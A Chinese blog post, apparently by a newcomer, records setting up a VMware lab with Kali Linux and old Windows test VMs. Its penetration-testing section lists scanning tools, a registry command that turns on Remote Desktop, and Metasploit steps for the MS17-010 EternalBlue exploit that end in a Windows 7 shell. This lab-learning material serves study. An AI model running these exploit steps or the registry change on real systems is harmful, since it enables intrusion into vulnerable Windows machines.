一、前言
最近突然对网络安全有兴趣,便升级了电脑配置,下载了Kali Linux和几个测试机,下面记录一下下载安装和简单使用的全过程
二、软件工具准备:
Vmware 虚拟机 v12或V15版本
Wireshark v2.4 版本(过滤器,数据包解读)
WinXP虚拟机
Win2003虚拟机
Kali Linux 镜像
Win7镜像由于不宜传播,工具关注后私信获取
三、安装配置
1、首先安装Vmware , 傻瓜式点击安装就行
安装成功之后,在电脑网络连接里面,可以看到多了2张虚拟网卡
虚拟网卡的功能,用于实现虚拟机与外部网络的通信
2、可能出现的问题
不支持降级问题
通常是原先电脑中安装过虚拟机了,并且版本比当前高,没有卸载干净导致,可以选择清楚干净,或者使用原先版本
3、利用Vmware导入kali-linux虚拟机
4、设置虚拟机网卡模式为net模式,确保虚拟机能够上网
5、正常操作后
注明:若虚拟机和真机出现"卡顿",可以通过调整虚拟机的内存来进行调整
kali linux是包含很多工具的一个Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、[live CD](https://baike.baidu.com/item/live CD/6871056)或[live USB](https://baike.baidu.com/item/live USB/7811031)运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook
6、win7安装常规操作
新建虚拟机导入镜像
7、win 2003安装常规操作
直接获取现有虚拟机包安装
8、win xp安装常规操作
和以上操作一样
到此所有虚拟机安装完成,并能成功联网
四、Kali Linux渗透测试
开启虚拟机
命令
- arp-scan/nbtscan:局域网扫描(找到主机)
- nmap:端口扫描(找到主机的服务)
- openvas/nessus:漏洞扫描(找到主机的漏洞)
MS12-020(Windows漏洞攻击)
【漏洞说明】
MS12-020:开启远程桌面服务(3389端口)的系统可被执行远程代码(蓝屏重启)
受影响系统:Windows XP、Windows 7、Server 2003/2008
https://technet.microsoft.com/library/security/ms12-020
DOS下开启远程服务:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
【渗透攻击】
1.可以用Nessus/OpenVAS扫描MS12-020漏洞
2.用MS12-020漏洞攻击工具
MS17-010(永恒之蓝)
Kali Linux -> Windows 7
msfconsole 进入msfconsole (metasploit)
msf > search ms17_010
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
攻击地址和端口号
查看win7地址
设置攻击地址
渗透攻击
进入win7 shell
拿到权限
五、安装遇到的问题
虚拟机开启,电脑蓝屏问题
1、版本兼容问题,win10和虚拟机16.1以下的不兼容
2、取消勾选 虚拟机平台和程序平台
3、电脑没有打开CPU虚拟化
4、把Hyper-V去掉或强制关闭这个服务
创作不易,给个关注点个赞吧❀❀❀